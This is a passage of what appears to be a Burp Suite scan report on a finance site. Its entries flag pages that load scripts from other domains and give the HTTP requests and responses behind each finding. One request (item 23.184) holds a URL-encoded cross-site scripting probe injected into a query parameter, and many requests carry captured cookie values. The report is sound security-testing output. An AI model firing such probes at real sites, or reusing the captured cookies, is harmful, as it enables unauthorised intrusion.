<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.173. http://money.redacted/how-to-invest

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-invest HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:45 GMT
Content-Length: 41961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.174. http://money.redacted/how-to-invest/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/default-dyn.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-invest/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:55 GMT
Content-Length: 40692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.175. http://money.redacted/how-to-invest/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-invest/default.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:14 GMT
Content-Length: 41976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.176. http://money.redacted/how-to-invest/how-to-invest-in-a-zigzag-economy-jubak.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/how-to-invest-in-a-zigzag-economy-jubak.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-invest/how-to-invest-in-a-zigzag-economy-jubak.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:09 GMT
Content-Length: 80571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.177. http://money.redacted/how-to-invest/invest-like-warren-buffett-in-2011-ap.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/invest-like-warren-buffett-in-2011-ap.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-invest/invest-like-warren-buffett-in-2011-ap.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:17 GMT
Content-Length: 72922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.178. http://money.redacted/how-to-invest/start-investing-with-just-100-dollars.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/start-investing-with-just-100-dollars.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-invest/start-investing-with-just-100-dollars.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:15 GMT
Content-Length: 67945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.179. http://money.redacted/how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:11 GMT
Content-Length: 81357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.180. http://money.redacted/how-to-invest/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/video.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-invest/video.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:57 GMT
Content-Length: 46360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.181. http://money.redacted/how-to-invest/what-you-did-not-learn-from-the-crash-weston.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/what-you-did-not-learn-from-the-crash-weston.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-invest/what-you-did-not-learn-from-the-crash-weston.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:17 GMT
Content-Length: 92780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.182. http://money.redacted/identity-theft/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /identity-theft/default-dyn.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /identity-theft/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=8a19b1c37abe4adaa07e1fe54f2a83e1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:03 GMT
Content-Length: 52097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.183. http://money.redacted/insurance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /insurance

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /insurance HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:30 GMT
Content-Length: 51504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.184. http://money.redacted/investing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /investing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1 HTTP/1.1
Host: money.redacted
Proxy-Connection: keep-alive
Referer: http://burp/show/13
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:22 GMT
ntCoent-Length: 84983
Content-Length: 84983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.185. http://money.redacted/investing/10-reasons-to-love-rising-prices-jubak.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /investing/10-reasons-to-love-rising-prices-jubak.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investing/10-reasons-to-love-rising-prices-jubak.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:18 GMT
Content-Length: 113130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.186. http://money.redacted/investing/stock-picks-to-change-your-life.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /investing/stock-picks-to-change-your-life.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investing/stock-picks-to-change-your-life.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:23 GMT
Content-Length: 65807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.187. http://money.redacted/loans

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /loans

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /loans HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:20 GMT
Content-Length: 49977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.188. http://money.redacted/market-news/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /market-news/post.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /market-news/post.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=fc74895a2afe4dbb8b81357837158fa3; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
